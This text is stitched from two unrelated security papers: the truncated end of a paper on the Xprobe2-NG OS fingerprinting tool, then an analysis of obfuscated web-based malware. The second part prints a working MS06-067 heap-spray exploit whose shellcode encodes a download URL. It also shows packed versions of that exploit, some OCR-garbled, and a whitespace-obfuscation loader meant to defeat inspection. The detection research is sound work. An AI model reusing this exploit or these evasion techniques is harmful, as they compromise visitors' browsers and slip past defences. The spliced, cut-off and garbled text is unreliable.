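The valid/invalid request idea can be illustrated with
a small Python sketch for the HTTP case. It is not the
Xprobe2-NG honeypot module: the helper names, the use
of HTTP status codes and the decision rule are
assumptions made for the example, and no network
traffic is generated here.

```python
import secrets


def random_path(extension=".html"):
    """Return an unpredictable path that should not exist on a real server."""
    return "/" + secrets.token_hex(8) + extension


def honeypot_suspected(valid_status, invalid_status):
    """Flag a service whose answers to valid and invalid requests are inconsistent.

    Assumed rule: a full implementation accepts the known-valid request and
    rejects the randomly named one; anything else is treated as suspicious.
    """
    valid_ok = 200 <= valid_status < 400
    invalid_ok = 200 <= invalid_status < 400
    return (not valid_ok) or invalid_ok
```

A caller would request a known-valid resource and
random_path(), then pass the two status codes to
honeypot_suspected().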

The detailed list of implemented application layer
tests is shown in Table 4.1. As can be observed from
this table, some of these tests can only differentiate
between classes of operating systems, while others may
identify characteristics, such as the filesystem type
in use, which are specific to particular operating
system(s) and may give some clues about the software
version in use.

We would like to further discuss the groups of
application layer tests supported by our tool.
However, it should be understood that the testing
possibilities at the application layer are not limited
to the methods discussed in this section. More
specific application layer tests, such as those used
for HTTP server fingerprinting [10] or Ajax
fingerprinting techniques [11], can be used to gain
additional precision in the remote system
fingerprinting process.

Figure 2: Xprobe2-NG Application Layer Tests

Underlying filesystem tests - this group of tests aims
at detecting how the underlying OS system calls handle
various characteristics of directory or file names.
For example, FAT32 and NTFS filesystems treat MS-DOS
file names, such as FOO~1.HTM, in a special way; file
names are case insensitive; and requests for file
names containing the special character 0x1a (EOF
marker) return different HTTP responses from a web
server running on top of Windows (403) and Unix (404).

Presence of special files - this method is not as
reliable as filesystem based methods, however it often
produces useful results. Some filesystems contain
special files, such as Thumbs.db, which is
automatically created on Windows systems when a folder
is accessed by Explorer. The file format differs
between OS versions. If such a file is obtained, it is
possible to validate whether the file was created on
the system where it is presently located by comparing
the application and file time stamps.
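
The two filesystem observations above (the 0x1a
request and case insensitivity) can be turned into a
small classification helper. The Python sketch below
only interprets status codes that a caller has already
collected; the function names, the probe file name and
the returned labels are assumptions for illustration.

```python
def eof_probe_path(name="index", extension=".html"):
    """Build a request path containing the 0x1a (EOF marker) character."""
    return "/" + name + "%1a" + extension


def classify_filesystem_tests(eof_status, lower_status, upper_status):
    """Turn HTTP status codes from filesystem probes into OS class hints.

    eof_status:   status returned for the 0x1a request
    lower_status: status for an existing file requested in lower case
    upper_status: status for the same file requested in upper case
    """
    hints = []
    if eof_status == 403:
        hints.append("windows")      # per the text: Windows answers 403
    elif eof_status == 404:
        hints.append("unix")         # per the text: Unix answers 404
    if lower_status == 200 and upper_status == 200:
        hints.append("case-insensitive filesystem")
    return hints
```

Each hint would typically be compared with the
matching key in a signature entry, for example
http_caseinsensitive in the signature shown earlier.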

We also believe it might be possible to further
differentiate operating systems at the application
layer by analyzing the encoding types supported by the
application or the underlying file system. It may also
be possible to analyze the distribution of application
layer response delays for different requests in order
to identify "fake" services or fingerprint particular
software versions. Further research in this area is
needed.

4.2 Optional TCP Port Scanning 

One of the motivations for developing the original
Xprobe2 tool was to avoid dependency on network
fingerprinting tests that require an excessive number
of network probes to collect preliminary information.
Xprobe2-NG network layer tests are primarily based on
a variety of ICMP protocol tests. Such tests do not
require any additional information about the target
system, such as open or closed UDP or TCP port
numbers, simply because there is no "port" concept in
the context of the protocol.

The optional TCP/UDP port scanning module, when
enabled, allows execution of TCP, UDP and application
layer tests, because only these tests require
knowledge of TCP and UDP port status.

Figure 3: Xprobe2-NG and nmap generated traffic loads

If the optional TCP/UDP port scanning module is not
executed, which is the default behavior, Xprobe2-NG
will only use information provided on the command line
(such as open port numbers) and the ports whose
statuses are discovered during execution of other
tests. Modules are reordered prior to execution in
order to minimize the total number of packets and make
the best use of the information that can be discovered
during each module execution. For example, the
application layer test that uses a UDP packet with an
SNMP query is placed for execution before the module
that requires a closed UDP port. When the SNMP query
is sent, the received response (if any) reveals the
status of the SNMP port on the target system. If the
UDP port is closed, an ICMP Port Unreachable response
is received. In this case the received datagram is
passed to the module that requires a closed UDP port.
If a UDP response is received, the SNMP signatures can
be matched against it. If no response is received, the
result of this test is not counted.

This way Xprobe2-NG maintains its minimal usage 
of packets for the network discovery. 
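
The three outcomes of the SNMP probe described above
can be written down as a small decision function. This
Python sketch is illustrative only: the Reply type,
the function name and the consumer labels are
hypothetical, and the default port 161 is the standard
SNMP port rather than something stated in the text.

```python
from enum import Enum


class Reply(Enum):
    UDP_RESPONSE = "udp"
    ICMP_PORT_UNREACHABLE = "icmp-port-unreachable"
    NONE = "none"


def dispatch_snmp_probe(reply, port=161):
    """Decide how the outcome of one SNMP probe is reused by other modules."""
    if reply is Reply.ICMP_PORT_UNREACHABLE:
        # The port is closed: hand the datagram to the closed-UDP-port module.
        return {"port": port, "state": "closed",
                "pass_to": "closed_udp_port_module", "counted": True}
    if reply is Reply.UDP_RESPONSE:
        # The service answered: match the reply against SNMP signatures.
        return {"port": port, "state": "open",
                "pass_to": "snmp_signature_matcher", "counted": True}
    # No reply at all: the test result is not counted.
    return {"port": port, "state": "unknown", "pass_to": None, "counted": False}
```

One probe therefore serves two modules, which is how
the packet count stays low without a port scan.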

5.0 EVALUATIONS 

We evaluated the new version of the Xprobe2-NG system
by executing Xprobe2-NG and nmap scans against a
number of different network systems: computer hosts
running Linux and Windows operating systems and a
variety of protocols, routers and networked printers.
Additionally, we tested Xprobe2-NG against a web
server running on the Linux operating system and
protected by the OpenBSD packet filter with packet
normalization turned on. We verified the correctness
of each execution and corrected the signatures when
necessary.

The HTTP application module was manually loaded in
Xprobe2-NG by specifying port 80 as an open port on
the Xprobe2-NG command line. The same parameter was
passed to the nmap tool. Nmap used the port for its
TCP ping probe to check the responsiveness of the
remote system.

We also performed a few test runs by simultaneously
executing Xprobe2-NG and nmap against unknown network
systems and recording the network traffic load
generated by each tool. The sampled network traffic
throughput, recorded with ntop, is shown in Figure 3.
Please note that nmap needs to execute port scanning
in order to successfully guess the remote operating
system type, while Xprobe2-NG can rely on the results
of tests that do not require any ports to be known,
with the exception of the application layer module.
The diagram simply demonstrates that it is possible to
decrease network overhead when no TCP port scanning is
performed.

6.0 DISCUSSIONS 

Our tool provides high-performance, high-accuracy
network scanning and network discovery techniques that
allow users to collect additional information about
the scanned environment. Xprobe2-NG focuses on using a
minimal number of packets to perform active operating
system fingerprinting, which makes the tool suitable
for larger-scale network discovery scans. However,
these benefits also lead to some limitations, which we
would like to discuss in this section.

In order to successfully fingerprint a target system,
Xprobe2-NG needs the remote host to respond to at
least some of the tests. If no preliminary information
is collected before the tests and some of the
protocols (such as ICMP) are blocked, Xprobe2-NG
results may be extremely imprecise, or the tool may
fail to collect any information at all. We consider
this the major limitation of the tool.

The other limitation, which concerns the application
layer tests, is that Xprobe2-NG currently does not
perform network service fingerprinting. This minimizes
network traffic overhead and the risk of crashing a
remote service; however, Xprobe2-NG may run the wrong
tests against services running on non-standard ports,
or even miss services running on uncommon port
numbers. Methods of low-overhead, risk-free network
service fingerprinting could be the subject of further
research that could resolve this limitation.

Also, although the tool is capable of fingerprinting a
remote host without any preliminary port scanning of
the target system, this may lead to significant
performance drops when running application layer tests
against filtered port numbers. We believe that a
preliminary port probe for each application layer test
may help to resolve this limitation.

Xprobe2-NG uses the libpcap library for its network
traffic capture needs. The library provides a uniform
interface to the network capture facilities of
different platforms and great portability, however it
also makes the tool unsuitable for high-performance,
large volume parallel network fingerprinting tasks,
due to high

7.0 CONCLUSION

8.0 AVAILABILITY

The developed application is free software, released
under the GNU General Public License. The discussed
version of this software will be released before the
conference at the project web site:
http://xprobe.sourceforge.net

Malware Obfuscation Tricks and Traps

By Wayne Huang (wayne@armorize.com, Armorize Technologies) & Aditya K Sood (Sr. Security Researcher, COSEINC) 



With growing Internet accessibility, a new trend in
malicious software (malware) has been rapidly
evolving. So-called Web-based malware typically
consists of multiple components and combines elements
written mostly in scripting languages (exploit
kits/packs), lightweight multi-platform binary
executables written in low-level languages (loaders),
and full-blown binaries with a set of actual
"malicious" functions. The first component (let's call
it boot-strap code) is developed in scripting
languages whose dynamic features make it easy to
obfuscate and much harder to detect with static
analysis. Malware obfuscation methods are extremely
dynamic and fast-evolving, and use obscure or
undocumented language features. Some obfuscation
techniques have taken malware obfuscation "kung fu" to
an absolutely new level, implementing not just simple
obfuscation but also malware steganographic
techniques. This paper discusses why Web-based malware
is difficult to detect, and proposes alternative
mechanisms for efficient detection.

The Web-Based Malware Threat 

The authors have seen web-based malware, often known
as "drive-by-download" attacks, since early 2000, and
in 2002 devised a client-honeypot-based detection
mechanism and conducted a mass-scale study [Huang03].
However, it wasn't until Provos et al.'s publication
in HOTBOTS'07 [Provos07], where Google claimed that
10% of its indexed pages contain malware, that the
public became widely aware of the threat. In 2008, a
follow-up research report by the same authors
demonstrated that, as of February 2008, Google had
indexed over 3 million URLs that initiate drive-by
downloads, and over 1.3% of queries submitted to
Google returned malicious URLs in the search results
[Provos08]. This research, however, wasn't late enough
to take into account the ongoing, mass-scale,
automated SQL injection attacks that insert web-based
malware into vulnerable websites [Keizer08-Jan], which
became known to the larger public in Jan 2008. By
April, such attacks were known to hit half a million
pages per wave of attack [Keizer08-Apr]. By May, they
were known to hit 1.5 million pages per wave of attack
[Dancho08-May].

When these automated tools are successful at
exploitation, they insert malicious (and obfuscated)
javascripts into content that is delivered to website
visitors; when they are not, the script becomes a part
of the content itself and is rendered, messing up the
original content and making it obvious that the
victim's site has been compromised. One can perform
the following sample searches on Google to see a list
of compromised websites:

Figure 1 shows a search on Google revealing more than
half a million sites mis-infected with malicious
javascripts. We call this "mis-infection" because
these are instances where the mass SQL injection was
unsuccessful, causing the malicious javascript to
become a part of the content itself and be indexed by
Google. Even if the injection had only a 50% success
rate, that would already make a million compromised
websites.

Javascript Kung-Fu: Why Detection is Difficult 

Many solutions have been proposed to detect such
inserted (web-based) malware; more precisely, to
detect obfuscated scripts inside the infected web
pages. Provos et al. [Provos07] [Provos08], for
example, devised Google's mechanisms. Security
companies large and small have also pushed out their
solutions. Unfortunately, the detection rate has been
low due to the nature of Web-based malware. Due to
speed considerations, today's detection techniques are
mostly signature-based pattern matching technologies.
Consider a gateway device trying to identify malware
inside inbound HTTP responses on a gigabyte network.
Each HTTP response must be processed in nanoseconds,
so behavior-based detection is simply impossible;
pattern-based detection is the only feasible approach.

Traditional host-based viruses or malware exist in the
form of binary executables, which makes obfuscation
(or packing) quite difficult, and therefore
pattern-based detection yields acceptable results.
Further, many antivirus products use heuristic
algorithms to monitor the virus execution process and
detect malicious behavior. However, the boot-strap
code of Web-based malware exists primarily in the form
of scripts (e.g., javascript, vbscript, actionscript),
which makes obfuscation extremely easy and
pattern-based detection almost impossible. Heuristic
detection is also difficult due to the nature of code
execution (inside the browser). For Windows and Unix
executables, dynamically generated executable code
(polymorphism) is not very common due to architectural
difficulties; in javascript, however, it is the norm.
Benign Windows and Unix executables are rarely
obfuscated, so detection mechanisms can simply detect
the fact that a binary is obfuscated and fire an
alarm. In Web scripting languages such as javascript
and vbscript, obfuscation is the norm because it is
seen as the only measure to protect the source code.
Since scripting languages are interpreted, scripts are
not compiled into binaries prior to execution and the
source code must be present for execution. Therefore
the only way to protect intellectual property is to
obfuscate the source code.

Over the years, many open source obfuscators have been
developed [Edwards] [Martin] [Vanish] [Shang]
[SaltStorm], and many commercial obfuscators are also
available [Jasob] [Ticket] [JSource]. A long survey of
open source, free and commercial script obfuscators
can be found in [AjaxPath]. Today, a majority of
commercial scripts are obfuscated by their providers.
Another reason to pack javascripts is size reduction
and hence speed gain. For this purpose, Yahoo! offers
and promotes its online javascript packer called the
Yahoo! User Interface Compressor [YUI], and Mootools
offers an online function for users to create their
own "build", which excludes unused javascripts and
packs used ones.

This all renders "treating packing as indicator of 
malware" a useless detection technique against Web- 
based malware. However, detecting malicious be- 
havior itself is almost impossible due to the dynamic 
nature of scripting languages. 

Take the following example. Below is a piece of 
drive-by-download code that exploits MS06-067: 

<script>
shellcode = unescape("%u4343"+"%u4343"+"%u4343" +
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" +
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" +
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" +
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" +
"%u6870%u7474%u3a70%u2f2f%u616d%u776c%u7261%u6765" +
"%u7275%u2e75%u6f63%u2f6d%u6f63%u6d6d%u6e6f%u655f" +
"%u6578%u742f%u7365%u2e74%u7661%u0069");
bigbk = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize + shellcode.length
while (bigbk.length < slackspace) bigbk += bigbk;
fillbk = bigbk.substring(0, slackspace);
bk = bigbk.substring(0, bigbk.length-slackspace);
while (bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;
memory = new Array();
for (i=0; i<800; i++) memory[i] = bk + shellcode;
var target = new ActiveXObject("DirectAnimation.PathControl");
target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));
</script>

(Snippet 1) 

Snippet 1 appears obviously malicious to automated
mechanisms as well as to humans.

Packing the above code with Dean Edwards' packer
[Edwards] (online & free) results in the following code:

eval (function(p,a,c,k,e,d) 
{ e=f unction (c) 

{return (c<a?' 1 :e (parselnt (c/ 
a) ) ) + ( (c=c%a) >35?String. 
f romCharCode (c+29) :c. 
toString (36) ) } ; while (c— ) {if (k[c] ) 
{p=p . replace (new RegExp( A \\ 
b' +e (c) +' \\b' , 'g' ) , k[c] ) } } return p} 
( A a=h P%9"+"%9"+"%9"+"%N%6%D%q%lh%6 
%lf%Y"+"%13%ll%Z%10%la%12%X%6"+"%T% 
S%U%V%k%W%14%15"+"%le%6%lg%lc%lb%17 
%c%16"+"%18%19%R%li%M%y%x%z"+"%A%w% 
C%e%u%r%c%s"+"%e%v%j%t%B%Q%l%j"+"%L 
%l%0%P%K%J%F%E"+"%G%H%I%ld%lt%lV%lU 
%lW"+"%lX%lY%lT%lS%lj%lN%lP%lQ"+"%2 
l%lZ%2 8%2a%2e%2b%2c%2d"+"%2 9%2 3%22% 
2 4%2 5%2 7%2 6%lR"+"%lL%lM%ls%lu%lv%lw 



%lr%lq"+"%k%ll%m%lk%m%lm%ln%lp"+"%l 
o%lx%ly%lH%lG%H") ;2=hP%g%g") ;f=20 
;4=f+a.5 d ( 2 . 5<4 ) 2+=2 ; p=2 . b ( 0 , 4 ) ; 3= 

2 .b (0,2 .5-4) ;d(3.5 + 4<U) 3=3 + 3+p;n=7 
8(); IK (i=0; i<lF; i++) n [i] =3+a; IE o=7 
1A( m 1z.1B") ;o.lC(lD f 7 8(l) f 7 8(10));' 
,62,139,' | | bigbk | bk | slackspace | length 
luOOOO | new | Array |u4 34 3 | shellcode | subs 
tring | uf f 53 | while | u5 6f f | headersize | uO 
DOD | unescape | |u8b5 6 |u72 7 5 |uf503 |u6f 63 
| memory | target | fillbk|ual64 |u50dc|u08 
5 6 |u3c7 5 |u8bl0 |u510c|u5350 |u0 0 65 |u780 
4 |u330 0 |u50c0 | u7 4 8b | u5057 | u5f 0 0 lulObe 
Iu0fdb|ud63a|u0 87 4 | ucbcl | u33c5 | u03ad | 
u2 07 6 |u034 4 | ua3e9 | uc933 | u414 9 | u7 82e | u 
2e61 |u6f 68 | uf 9e2 |u0 0 6e |u68 0 0 |u6d6c|u0 
043 |u8b0c|u0 8 68 | uf 7 8b | u8bad | ue85 9 | ulc 
7 0 luff 54 |u9516 |u045 6 |u2 0 6a|u04c7 |u5c0 
3 | uO 4 6a | udc8b | u2 0ec | u030d| u2ee8 | u4 0 8b 
|u830 0 |u0 030 |uc7 65 Iu4b0c|u2f6d|u2e7 5 | 
u6d6d|u6e6f |u657 8 | u655f | u67 65 | u72 61 |u 
3a70 |u40da|u2f2f |u616d|u77 6c|u742f |u7 

3 65| DirectAnimation | ActiveXOb j ect | Pat 
hControl | KeyFrame | 0x7f f f f f f f | var | 800 | 
u7 6 61 |u2e7 4 |u00 69 | 0x4 0000 | for |u687 0 |u 
7 47 4 |u5e8b| 65535 | u031c | u8bdd | u2 f la | u8 
b6 6 |udd03 | ulf 3b | uf leb | ue7 7 5 | u8b5e |u2 4 
5e |uc503 | |u8b0 4 |u98b8 | ue57 9 | u8af e | uef 
0e|u3660|ue0ce|u5eab|uclec|uc359|ufff 
f | u8ef f I u0e4e | u58e8' . split ( A \' ) ) ) 

(Snippet 2) 

Here the carrier is the "eval()" function and the
payload is what's contained inside the eval()
function. Snippet 2 defeats most automated mechanisms,
but the "eval" appears suspicious to the human eye.
The names of variables are also kept, and the name
"shellcode" certainly doesn't look friendly.
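
The function(p,a,c,k,e,d) wrapper in Snippet 2 is
essentially a dictionary substitution: every word of
the original script is replaced by a short token, and
the word list is appended as a '|' separated string.
The Python sketch below reimplements that substitution
offline, based on the decoder visible at the start of
Snippet 2. The function names are ours, and the
single-pass regular expression replaces the packer's
loop of per-token replacements, which is an assumption
that holds when no restored word is itself a token.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(c, base):
    """Mirror of the packer's e(c): word index -> short token (base up to 62)."""
    prefix = "" if c < base else encode_index(c // base, base)
    c %= base
    # Values 36..61 map to 'A'..'Z', as String.fromCharCode(c + 29) does.
    return prefix + (chr(c + 29) if c > 35 else DIGITS[c])


def unpack(payload, base, count, words):
    """Replace every token in `payload` with the word it stands for."""
    table = {encode_index(i, base): w for i, w in enumerate(words[:count]) if w}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)
```

For example, unpack('1 0=2 3()', 62, 4,
'shellcode|var|new|Array'.split('|')) restores the
statement 'var shellcode=new Array()'. Because the
word list travels with the script in clear text, the
variable names remain visible, as noted above.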

Packing the original Snippet 1 with the [Scriptasylum]
Javascript Encoder (online & free) generates the
following:

document . write (unescape ( A %3C%73%63%7 
2%69%7 0%7 4%2 0%6C%61%6E%67%75%61%67%6 
5%3D%22%6A%61%7 6%61%73%63%72%69%7 0% 
7 4%22%3E%66%75%6E%63%7 4%69%6F%6E%2 0 
%64%4 6%2 8%73%2 9%7B%7 6%61%72%2 0%73%31 
%3D%75%6E%65%73%63%61%7 0%65%2 8%73%2 
E%7 3%7 5%62%7 3%7 4%72%2 8%30%2C%7 3%2E% 
6C%65%6E%67%7 4%68%2D%31%2 9%2 9%3B%2 0 
%7 6%61%72%2 0%7 4%3D%27%2 7%3B%66%6F%72% 
2 8%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%7 4%68%3B%6
E%67%7 4%68%3B%6 9%2B%2B%2 9%7 4%2B%3D%53 
%7 4%72%6 9%6E%67%2E%6 6%72%6F%6D%4 3%68% 
61%72%43%6F%64%65%2 8%73%31%2E%63%68%6 
1%72%4 3%6F%64%65%41%7 4%2 8%6 9%2 9%2D%7 3 
%2E%7 3%7 5%62%7 3%7 4%72%2 8%7 3%2E%6C%65% 
6E%67%7 4%68%2D%31%2C%31%2 9%2 9%3B%64%6 
F%63%7 5%6D%65%6E%7 4%2E%7 7%72%6 9%7 4%65 
%2 8%75%6E%65%73%63%61%7 0%65%2 8%7 4%2 9% 

2 9%3B%7D%3C%2F%7 3%63%72%6 9%7 0%7 4%3E' ) 

) ;dF ( A tifmmdpef %2 631%2 64E%2 631vof tdbq 
f%2 63 9%2 633%2 63 6v54 54%2 633%2C%2 633%2 6 

3 6v54 54%2 633%2C%2 633%2 63 6v54 54%2 633%2 
631%2C%2 631%2 61B%2 633%2 63 6vb4f%3A%2 63 
6vllll%2 63 6v6gll%2 63 6vb2 7 5%2 63 6vll41% 
2 63 6vllll%2 63 6v519c%2 63 6v9cld%2 633%2 6 
31%2C%2 61B%2 633%2 63 6v2d81%2 63 6v9cbe%2 
63 6vl97 9%2 63 6vg8 9c%2 63 6vl57b%2 63 6vf 9 6 
%3A%2 63 6vll54%2 63 6vllll%2 633%2 631%2C% 

2 61B%2 633%2 63 6vg%3Af3%2 63 6v7g7 9%2 63 6v 
117f%2 63 6v7 911%2 63 6v838 6%2 63 6v7e7d%2 6 

3 6vgg65%2 63 6v%3A62 7%2 633%2 631%2C%2 61B 
%2 633%2 63 6v3f f 9%2 63 6vllll%2 63 6v9411%2 
63 6v31fd%2 63 6ved9c%2 63 6v317b%2 63 6vgg6 
4%2 63 6vl5 67%2 633%2 631%2C%2 61B%2 633%2 6 
3 6vl5d8%2 63 6v6dl4%2 63 6v3f 72%2 63 6vd8 7 6 
%2 63 6vl4 55%2 63 6v8 915%2 63 6vll7 6%2 63 6v4 
411%2 633%2 631%2C%2 61B%2 633%2 63 6v61dl% 
2 63 6v64 61%2 63 6v6168%2 63 6v67gg%2 63 6v9c 
21%2 63 6v61ed%2 63 6vgg64%2 63 6vl9 67%2 633 
%2 631%2C%2 61B%2 633%2 63 6v67gg%2 63 6v621 
d%2 63 6v9c67%2 63 6v4d8 6%2 63 6v85 9c%2 63 6v- 
8 93f%2 63 6vg614%2 63 6v9c67%2 633%2 631%2C 
%2 61B%2 633%2 63 6v318 7%2 63 6vg614%2 63 6vd 
%3A4 4%2 63 6v52 5%3A%2 63 6vl4be%2 63 6v4 4d6 
%2 63 6vlgec%2 63 6v21cf%2 633%2 631%2C%2 61 
B%2 633%2 63 6ve7 4b%2 63 6vl985%2 63 6vdcd2% 
2 63 6vl41e%2 63 6v51eb%2 63 6vg2fc%2 63 6v2g 
4c%2 63 6vf 8 8 6%2 633%2 631%2C%2 61B%2 633%2 
63 6v9c6f%2 63 6v35 6f%2 63 6veel4%2 63 6v9c7 
7%2 63 6v5cld%2 63 6v6f 9c%2 63 6vl42d%2 63 6v 
9cee%2 633%2 631%2C%2 61B%2 633%2 63 6v9cl5 
%2 63 6vd614%2 63 6v6fbc%2 63 6vd4 6%3A%2 63 6 
v6 9f 9%2 63 6vgggg%2 63 6v9fgg%2 63 6vlf5f%2 
633%2 631%2C%2 61B%2 633%2 63 6vd2fd%2 63 6v 
f 68%3A%2 63 6v%3A9c9%2 63 6v9bgf%2 63 6vfgl 
f%2 63 6vf Idf%2 63 6v4 7 71%2 63 6v3g2b%2 633% 
2 631%2C%2 61B%2 633%2 63 6v7 981%2 63 6v8585 
%2 63 6v4b81%2 63 6v3g3g%2 63 6v72 7e%2 63 6v8 
8 7d%2 63 6v8372%2 63 6v7 8 7 6%2 633%2 631%2C% 



2 61B%2 633%2 63 6v838 6%2 63 6v3f 8 6%2 63 6v7g 
7 4%2 63 6v3g7e%2 63 6v7g7 4%2 63 6v7e7e%2 63 6 
v7f 7g%2 63 6v7 6 6g%2 633%2 631%2C%2 61B%2 63 
3%2 63 6v7 68 9%2 63 6v853g%2 63 6v8 4 7 6%2 63 6v 
3f 85%2 63 6v8 7 72%2 63 6vll7%3A%2 633%2 63%3 
A%2 64C%2 61Bcjhcl%2 631%2 64E%2 631voftdb 
qf%2 63 9%2 633%2 63 6vlElE%2 63 6vlElE%2 633 
%2 63%3A%2 64C%2 61Bifbefstj%7Bf%2 631%2 6 
4E%2 63131%2 64C%2 61Btmbdltqbdf%2 631%2 6 
4E%2 631ifbefstj%7Bf%2 631%2C%2 631tifmm 
dpef /mfohui%2 61Bxijmf %2 631 %2 63 9c jhcl/ 
mfohui%2 631%2 64D%2 631tmbdltqbdf%2 63% 
3A%2 631cjhcl%2 631%2C%2 64E%2 631cjhcl% 
2 64C%2 61Bgjmmcl%2 631%2 64E%2 631cjhcl/ 
tvctusjoh%2 63 91%2 63D%2 631tmbdltqbdf % 
2 63%3A%2 64C%2 61Bcl%2 631%2 64E%2 631cj 
hcl/tvctusjoh%2 63 91%2 63D%2 631cjhcl/ 
mfohui . tmbdltqbdf %2 63%3A%2 64C%2 61Bxi j 
mf %2 63 9cl/mfohui%2Ctmbdltqbdf %2 631%2 6 
4D%2 6311y51111%2 63%3A%2 631cl%2 631%2 64 
E%2 631cl%2 631%2C%2 631cl%2 631%2C%2 631g 
jmmcl%2 64C%2 61Bnfnpsz%2 631%2 64E%2 631o 
fx%2 631Bssbz%2 63 9%2 63%3A%2 64C%2 61Bgps 
%2 631%2 63 9j%2 64El%2 64Cj%2 64D911%2 64Cj 
%2C%2C%2 63%3A%2 631nfnpsz%2 6 6Cj%2 6 6E%2 
631%2 64E%2 631cl%2 631%2C%2 631tifmmdpef 
%2 64C%2 61Bwbs%2 631ubshfu%2 631%2 64E%2 6 
31ofx%2 631BdujwfYPckfdu%2 63 9%2 633Ejsf 
duBojnbujpo/QbuiDpouspm%2 633%2 63%3A%2 
64C%2 61Bubshfu/Lf zGsbnf %2 63 91y8gggggg 
g%2 63D%2 631ofx%2 631Bssbz%2 63 92%2 63%3A 
%2 63D%2 631ofx%2 631Bssbz%2 63 97 6 64 6%2 63 
%3A%263%3A%264C%261B1' ) 

(Snippet 3) 

Here the carrier is "document.write()" and the payload
is what's inside it. Most features of the original
Snippet 1 have been eliminated, and it is now
difficult for automated mechanisms to identify
Snippet 3 as being malicious. They can identify that
Snippet 3 has been obfuscated, but remember that these
online obfuscators are very popular. Quoted from
Scriptasylum's description of their packer: "This
script will encode javascript to make it more
difficult for people to read and/or steal. Just follow
the directions below." Considering all obfuscated code
as malicious will result in a high false positive
rate.
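
Percent-decoding the first argument of
document.write() in Snippet 3 yields a small helper,
dF(s), that unescapes its input, subtracts the value
of the final digit from every character code and
unescapes the result again. The Python sketch below
reproduces that scheme so that such payloads can be
decoded without executing them. The encode() function
is our own inverse, added only for testing, and
urllib's unquote() does not handle the %uXXXX form
that javascript's unescape() accepts.

```python
from urllib.parse import quote, unquote


def encode(source, shift=1):
    """Hypothetical inverse of decode(); `shift` must be a single digit."""
    escaped = quote(source, safe="")
    shifted = "".join(chr(ord(ch) + shift) for ch in escaped)
    return quote(shifted, safe="") + str(shift)


def decode(blob):
    """Undo the dF(s) scheme: the last character is the shift amount."""
    shift = int(blob[-1])
    shifted = unquote(blob[:-1])
    escaped = "".join(chr(ord(ch) - shift) for ch in shifted)
    return unquote(escaped)
```

With a shift of 1, the string "tifmmdpef" at the start
of the dF() argument in Snippet 3 decodes to
"shellcode".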

But in the process of incident response analysis, a
human expert will easily spot this seemingly malicious
script, and can reverse the script back to its
original form by using javascript de-obfuscators
designed to analyze malicious scripts. A very popular
tool is [Malzilla], which does a decent job.

Unfortunately, there are obfuscation algorithms today
designed to defeat popular de-obfuscation tools such
as [Malzilla]. A large collection of such online
obfuscation tools can be found at sites such as
http://cha88.cn. Dean Edwards' packer [Edwards] is
also included and named "packer by foreigner."

Figure 2: cha88.cn hosts many obfuscation tools online.
Second from the left is "obfuscation tool by foreigner,"
which is Dean Edwards' packer.

Online obfuscation tools are now a standard
functionality of most webshells. Below is a screenshot
of Crab's webshell, which includes a link to cha88.cn,
as well as batch (malicious) javascript insertion
functionalities:

Figure 3: One of cha88's script / css / html encoder /
decoder user interfaces

Figure 4: Crab's webshell, which includes a link to
cha88.cn, as well as batch (malicious) javascript
insertion functionalities.

Using one of its online packers [Cha88.cn-1] against
Snippet 1 generates the following code:
The codes are laid out clockwise from
top-left to bottom-right.

(Snippet 4)

Due to its special design, [Malzilla] will fail to reverse
the above code. Here the payload is the KeyStr
variable, and the carrier
"t=eval("mydata(String.fromCharCode("+t+"))");document.write(t);"
looks familiar. Yes, this algorithm has been widely used
by malware authors and in the mass SQL injection attacks
ongoing since January of this year. So although algorithms
like the above defeat most automated detection
mechanisms, Snippet 3 still seems very suspicious to the
human eye.

At DEFCON 16, [Kolisar] presented the whitespace
obfuscation (WSO) method, which defeats
both automated and human inspection. Using it
(hosted online at http://malwareguru.com/kolisar/WhiteSpaceEncode.html)
to encode Snippet 3 generates the following code:

    <script id='p'>
    d = 0;
    e = 0;
    h = this;
    // find the property named "document" by length and two character codes
    for (i in h)
    {
        if (i.length == 8)
        {
            if (i.charCodeAt(0) == 100)
            {
                if (i.charCodeAt(7) == 116)
                {
                    break;
                }
            }
        }
    }
    // find "write"
    for (j in h[i])
    {
        if (j.length == 5)
        {
            if (j.charCodeAt(0) == 119)
            {
                if (j.charCodeAt(1) == 114)
                {
                    break;
                }
            }
        }
    }
    // find "getElementById"
    for (k in h[i])
    {
        if (k.length == 14)
        {
            if (k.charCodeAt(0) == 103)
            {
                if (k.charCodeAt(3) == 69)
                {
                    break;
                }
            }
        }
    }
    r = h[i][k]('p');
    // find "innerHTML"
    for (l in r)
    {
        if (l.length == 9)
        {
            if (l.charCodeAt(0) == 105)
            {
                if (l.charCodeAt(5) == 72)
                {
                    break;
                }
            }
        }
    }
    a = r[l];
    b = a.split('\n');
    o = "";
    for (c = 3; c < (e + 3); c++)
    {
        s = b[c];
        for (f = 0; f < d; f++)
        {
            y = ((s.length - (8 * d)) + (f * 8));
            v = 0;
            for (x = 0; x < 8; x++)
            {
                // this test is missing from the printed listing; it is
                // restored from the description below (tab = 1, space = 0)
                if (s.charCodeAt(x + y) == 9)
                {
                    v++;
                }
                if (x != 7)
                {
                    v = v << 1;
                }
            }
            o += String.fromCharCode(v);
        }
    }
    h[i][j](o);
    </script>

(Snippet 5)

The WSO attack is unique in two respects. First, it defeats
manual human inspection because it does not contain
